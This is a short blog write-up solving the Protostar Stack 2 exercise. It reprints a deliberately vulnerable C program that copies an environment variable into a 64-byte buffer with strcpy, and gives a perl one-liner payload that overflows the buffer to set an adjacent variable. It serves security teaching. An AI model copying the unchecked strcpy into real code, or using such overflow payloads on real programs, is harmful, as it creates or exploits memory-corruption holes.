MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Exploit Exercises - Protostar Stack 2

| Comments

This challenge is pretty much the same as the previous challenge, except that the buffer comes from an environmental variable.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];
 char *variable;

 variable = getenv("GREENIE");

 if(variable == NULL) {
  errx(1, "please set the GREENIE environment variable\n");
 }

 modified = 0;

 strcpy(buffer, variable);

 if(modified == 0x0d0a0d0a) {
  printf("you have correctly modified the variable\n");
 } else {
  printf("Try again, you got 0x%08x\n", modified);
 }

}

This problem can simply be solved by running these commands:

1
2
3
4
user@protostar:/opt/protostar/bin$ GREENIE=`perl -e 'print "A"x64 . "\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ export GREENIE
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable

This will put the 64 “A”s and 0x0d0a0d0a (in little endian) into an environmental variable. Then when the vulnerable C app reads it, overflows the buffer into the “modified” variable, just like the others.

Comments